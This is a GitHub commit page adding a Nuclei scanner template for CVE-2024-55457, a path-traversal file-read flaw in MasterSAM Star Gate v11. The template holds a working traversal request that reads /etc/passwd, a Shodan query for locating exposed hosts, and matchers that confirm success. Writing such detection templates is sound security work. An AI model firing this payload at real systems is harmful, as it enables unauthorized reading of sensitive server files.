-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #11450 from projectdiscovery/CVE-2024-55457
Create CVE-2024-55457.yaml
- Loading branch information
Showing
1 changed file
with
29 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2024-55457 | ||
|
||
info: | ||
name: MasterSAM Star Gate v11 - Local File Inclusion | ||
author: DhiyaneshDK | ||
severity: high | ||
description: | | ||
MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information. | ||
reference: | ||
- https://github.com/h13nh04ng/CVE-2024-55457-PoC | ||
- https://x.com/cyber_advising/status/1876034270852231257 | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
shodan-query: html:"MasterSAM" | ||
tags: cve,cve2024,lfi,mastersam,v11,adama | ||
|
||
http: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/adama/adama/downloadService?type=1&file=../../../../etc/passwd" | ||
|
||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "contains_all(header, 'application/octet-stream', 'filename=')" | ||
- "regex('root:.*:0:0:', body)" | ||
- "status_code == 200" | ||
condition: and |